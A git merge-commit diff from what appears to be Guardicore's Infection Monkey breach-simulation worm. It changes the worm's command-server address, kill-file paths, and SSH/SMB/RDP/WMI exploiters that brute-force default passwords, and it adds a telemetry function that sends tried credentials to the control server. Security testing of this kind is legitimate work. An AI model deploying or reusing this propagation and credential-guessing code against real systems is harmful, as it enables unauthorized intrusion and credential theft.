Merge branch 'master' of https://github.com/guardicore/monkey
# Conflicts: # monkey_island/deb-package/monkey_island_pip_requirements.txt
This commit is contained in:
commit
f1857a04f8
|
@ -110,8 +110,8 @@ class Configuration(object):
|
|||
###########################
|
||||
# Kill file
|
||||
###########################
|
||||
kill_file_path_windows = os.path.expandvars("%temp%\~df4150.tmp")
|
||||
kill_file_path_linux = '/tmp/user-4150'
|
||||
kill_file_path_windows = os.path.expandvars("%windir%\monkey.not")
|
||||
kill_file_path_linux = '/var/run/monkey.not'
|
||||
|
||||
###########################
|
||||
# monkey config
|
||||
|
@ -147,7 +147,7 @@ class Configuration(object):
|
|||
|
||||
#Configuration servers to try to connect to, in this order.
|
||||
command_servers = [
|
||||
"127.0.0.1:5000"
|
||||
"41.50.73.31:5000"
|
||||
]
|
||||
|
||||
# sets whether or not to locally save the running configuration after finishing
|
||||
|
@ -194,7 +194,7 @@ class Configuration(object):
|
|||
psexec_passwords = ["Password1!", "1234", "password", "12345678"]
|
||||
|
||||
# ssh exploiter
|
||||
ssh_user = "root"
|
||||
ssh_users = ["root"]
|
||||
ssh_passwords = ["Password1!", "1234", "password", "12345678"]
|
||||
|
||||
# rdp exploiter
|
||||
|
|
|
@ -1,6 +1,6 @@
|
|||
{
|
||||
"command_servers": [
|
||||
"russian-mail-brides.com:5000"
|
||||
"41.50.73.31:5000"
|
||||
],
|
||||
"internet_services": [
|
||||
"monkey.guardicore.com",
|
||||
|
@ -37,8 +37,9 @@
|
|||
"dropper_target_path": "C:\\Windows\\monkey.exe",
|
||||
"dropper_target_path_linux": "/bin/monkey",
|
||||
|
||||
"kill_file_path_linux": "/tmp/user-4150",
|
||||
"kill_file_path_windows": "%temp%\\~df4150.tmp",
|
||||
|
||||
"kill_file_path_linux": "/var/run/monkey.not",
|
||||
"kill_file_path_windows": "%windir%\\monkey.not",
|
||||
"dropper_try_move_first": false,
|
||||
"exploiter_classes": [
|
||||
"SSHExploiter",
|
||||
|
@ -68,7 +69,9 @@
|
|||
"serialize_config": false,
|
||||
"singleton_mutex_name": "{2384ec59-0df8-4ab9-918c-843740924a28}",
|
||||
"skip_exploit_if_file_exist": true,
|
||||
"ssh_user": "root",
|
||||
"ssh_user": [
|
||||
"root"
|
||||
],
|
||||
"local_network_scan": true,
|
||||
"tcp_scan_get_banner": true,
|
||||
"tcp_scan_interval": 200,
|
||||
|
|
|
@ -13,7 +13,7 @@ from model import RDP_CMDLINE_HTTP_BITS, RDP_CMDLINE_HTTP_VBS
|
|||
from model.host import VictimHost
|
||||
from network.tools import check_port_tcp
|
||||
from exploit.tools import get_target_monkey
|
||||
from tools import build_monkey_commandline
|
||||
from tools import build_monkey_commandline,report_failed_login
|
||||
__author__ = 'hoffer'
|
||||
|
||||
KEYS_INTERVAL = 0.1
|
||||
|
@ -295,6 +295,9 @@ class RdpExploiter(HostExploiter):
|
|||
exploited = True
|
||||
host.learn_credentials(self._config.psexec_user, password)
|
||||
break
|
||||
else:
|
||||
#failed exploiting with this user/pass
|
||||
report_failed_login(self, host, self._config.psexec_user, password)
|
||||
|
||||
except Exception, exc:
|
||||
LOG.debug("Error logging into victim %r with user"
|
||||
|
|
|
@ -6,7 +6,7 @@ from exploit import HostExploiter
|
|||
from network.tools import check_port_tcp
|
||||
from exploit.tools import SmbTools, get_target_monkey
|
||||
from network import SMBFinger
|
||||
from tools import build_monkey_commandline
|
||||
from tools import build_monkey_commandline,report_failed_login
|
||||
|
||||
try:
|
||||
from impacket import smb
|
||||
|
@ -88,9 +88,12 @@ class SmbExploiter(HostExploiter):
|
|||
host.learn_credentials(self._config.psexec_user, password)
|
||||
exploited = True
|
||||
break
|
||||
else:
|
||||
#failed exploiting with this user/pass
|
||||
report_failed_login(self, host, self._config.psexec_user, password)
|
||||
|
||||
except Exception, exc:
|
||||
LOG.debug("Error logging into victim %r with user"
|
||||
LOG.debug("Exception when trying to copy file using SMB to %r with user"
|
||||
" %s and password '%s': (%s)", host,
|
||||
self._config.psexec_user, password, exc)
|
||||
continue
|
||||
|
|
|
@ -1,12 +1,13 @@
|
|||
import paramiko
|
||||
import monkeyfs
|
||||
import logging
|
||||
from tools import build_monkey_commandline
|
||||
import time
|
||||
from itertools import product
|
||||
import monkeyfs
|
||||
from tools import build_monkey_commandline,report_failed_login
|
||||
from exploit import HostExploiter
|
||||
from model import MONKEY_ARG
|
||||
from exploit.tools import get_target_monkey
|
||||
from network.tools import check_port_tcp
|
||||
import time
|
||||
|
||||
__author__ = 'hoffer'
|
||||
|
||||
|
@ -43,31 +44,35 @@ class SSHExploiter(HostExploiter):
|
|||
return False
|
||||
|
||||
passwords = list(self._config.ssh_passwords[:])
|
||||
known_password = host.get_credentials(self._config.ssh_user)
|
||||
if known_password is not None:
|
||||
if known_password in passwords:
|
||||
passwords.remove(known_password)
|
||||
passwords.insert(0, known_password)
|
||||
users = list(self._config.ssh_users)
|
||||
known_passwords = [host.get_credentials(x) for x in users]
|
||||
if len(known_passwords) > 0:
|
||||
for known_pass in known_passwords:
|
||||
if known_pass in passwords:
|
||||
passwords.remove(known_pass)
|
||||
passwords.insert(0, known_pass) #try first
|
||||
user_pass = product(users,passwords)
|
||||
|
||||
exploited = False
|
||||
for password in passwords:
|
||||
for user, curpass in user_pass:
|
||||
try:
|
||||
ssh.connect(host.ip_addr,
|
||||
username=self._config.ssh_user,
|
||||
password=password,
|
||||
username=user,
|
||||
password=curpass,
|
||||
port=port,
|
||||
timeout=None)
|
||||
|
||||
LOG.debug("Successfully logged in %r using SSH (%s : %s)",
|
||||
host, self._config.ssh_user, password)
|
||||
host.learn_credentials(self._config.ssh_user, password)
|
||||
host, user, curpass)
|
||||
host.learn_credentials(user, curpass)
|
||||
exploited = True
|
||||
break
|
||||
|
||||
except Exception, exc:
|
||||
LOG.debug("Error logging into victim %r with user"
|
||||
" %s and password '%s': (%s)", host,
|
||||
self._config.ssh_user, password, exc)
|
||||
user, curpass, exc)
|
||||
report_failed_login(self,host,user,curpass)
|
||||
continue
|
||||
|
||||
if not exploited:
|
||||
|
|
|
@ -415,3 +415,10 @@ def build_monkey_commandline(target_host, depth):
|
|||
cmdline += " -d %d" % depth
|
||||
|
||||
return cmdline
|
||||
|
||||
|
||||
def report_failed_login(exploiter, machine, user, password):
|
||||
from control import ControlClient
|
||||
ControlClient.send_telemetry('exploit', {'result': False, 'machine': machine.__dict__,
|
||||
'exploiter': exploiter.__class__.__name__,
|
||||
'user':user,'password':password})
|
|
@ -6,7 +6,8 @@ from tools import build_monkey_commandline
|
|||
from model import DROPPER_CMDLINE, MONKEY_CMDLINE
|
||||
from model.host import VictimHost
|
||||
from exploit import HostExploiter
|
||||
from exploit.tools import SmbTools, WmiTools, AccessDeniedException, get_target_monkey
|
||||
from exploit.tools import SmbTools, WmiTools, AccessDeniedException, get_target_monkey, report_failed_login
|
||||
from impacket.dcerpc.v5.rpcrt import DCERPCException
|
||||
|
||||
LOG = logging.getLogger(__name__)
|
||||
|
||||
|
@ -49,6 +50,11 @@ class WmiExploiter(HostExploiter):
|
|||
LOG.debug("Failed connecting to %r using WMI with password '%s'",
|
||||
host, password)
|
||||
continue
|
||||
except DCERPCException, exc:
|
||||
report_failed_login(self, host, self._config.psexec_user, password)
|
||||
LOG.debug("Failed connecting to %r using WMI with password '%s'",
|
||||
host, password)
|
||||
continue
|
||||
except socket.error, exc:
|
||||
LOG.debug("Network error in WMI connection to %r with password '%s' (%s)",
|
||||
host, password, exc)
|
||||
|
|
|
@ -66,6 +66,12 @@ def main():
|
|||
|
||||
print "Loaded Configuration: %r" % WormConfiguration.as_dict()
|
||||
|
||||
#Make sure we're not in a machine that has the kill file
|
||||
kill_path = WormConfiguration.kill_file_path_windows if sys.platform == "win32" else WormConfiguration.kill_file_path_linux
|
||||
if os.path.exists(kill_path):
|
||||
print "Kill path found, finished run"
|
||||
return True
|
||||
|
||||
try:
|
||||
if MONKEY_ARG == monkey_mode:
|
||||
log_path = os.path.expandvars(WormConfiguration.monkey_log_path_windows) if sys.platform == "win32" else WormConfiguration.monkey_log_path_linux
|
||||
|
|
|
@ -49,7 +49,7 @@ Linux (Tested on Ubuntu 12.04):
|
|||
sudo pip install paramiko
|
||||
sudo pip install psutil
|
||||
sudo pip install netifaces
|
||||
sudo pip install https://github.com/pyinstaller/pyinstaller/releases/download/3.0.dev2/PyInstaller-3.0.dev2.tar.gz
|
||||
sudo pip install PyInstaller
|
||||
sudo apt-get install winbind
|
||||
2. Put source code in /home/user/Code/monkey/chaos_monkey
|
||||
3. To build, run in terminal:
|
||||
|
|
|
@ -1,5 +1,11 @@
|
|||
python-dateutil
|
||||
tornado
|
||||
werkzeug
|
||||
jinja2
|
||||
markupsafe
|
||||
itsdangerous
|
||||
click
|
||||
bson
|
||||
flask
|
||||
Flask-Pymongo
|
||||
Flask-Restful
|
||||
python-dateutil
|
||||
tornado
|
||||
Flask-Restful
|
|
@ -1,9 +0,0 @@
|
|||
[Unit]
|
||||
Description=Monkey Island Service
|
||||
|
||||
[Service]
|
||||
WorkingDirectory=/var/monkey_island/cc
|
||||
ExecStart=/usr/bin/python main.py
|
||||
|
||||
[Install]
|
||||
WantedBy=multi-user.target
|
|
@ -1,9 +0,0 @@
|
|||
[Unit]
|
||||
Description=Monkey Island Mongo Service
|
||||
|
||||
[Service]
|
||||
WorkingDirectory=/var/monkey_island/
|
||||
ExecStart=/var/monkey_island/bin/mongodb/bin/mongod --dbpath db
|
||||
|
||||
[Install]
|
||||
WantedBy=multi-user.target
|
|
@ -1,7 +1,11 @@
|
|||
python-dateutil
|
||||
tornado
|
||||
werkzeug
|
||||
jinja2
|
||||
markupsafe
|
||||
itsdangerous
|
||||
click
|
||||
bson
|
||||
flask
|
||||
Flask-Pymongo
|
||||
Flask-Restful
|
||||
python-dateutil
|
||||
impacket
|
||||
pycrypto
|
||||
tornado
|
||||
Flask-Restful
|
Loading…
Reference in New Issue